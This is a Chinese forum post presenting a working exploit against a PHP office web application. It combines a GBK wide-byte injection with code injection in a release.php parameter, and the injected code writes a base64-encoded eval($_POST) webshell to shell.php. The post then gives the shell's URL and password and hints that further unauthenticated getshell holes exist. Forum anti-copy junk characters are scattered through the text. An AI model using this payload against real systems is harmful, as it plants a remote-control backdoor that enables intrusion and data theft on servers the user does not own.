此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
0 {. k3 q; O; p7 L& z
. W+ w' O( N8 x1 X: v/ c 3 m( Z, k! `: j9 r9 e6 H% D9 a% t
EXP:
2 M1 |1 q/ y f# C2 V 1 N. R- Y& o G7 T4 S
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}; }5 v; e1 K# ]
/ c Q+ m% ]" J l* a
第二步: [GET]http://site/general/email/index.php
8 f, w" N( ?. j1 }6 K3 c/ L5 l; c& U
. q" \: w$ [) q) o+ N( i8 nSHELL: http://site/general/email/shell.php 密码C9 Q( |7 W J1 q. Z3 b: ~+ R
% H' O. `! r1 R& ?3 W
) l$ n6 U6 q; R8 O8 k T* a1 t, v
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好8 n0 M0 Y) p k* G
1 i0 \5 C1 i3 o5 u有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
. q1 L- n, y- d5 X' k
5 k6 ~' a9 r- A+ D; O3 G, Z) _0 W4 @8 A6 i- G* I% V$ A
|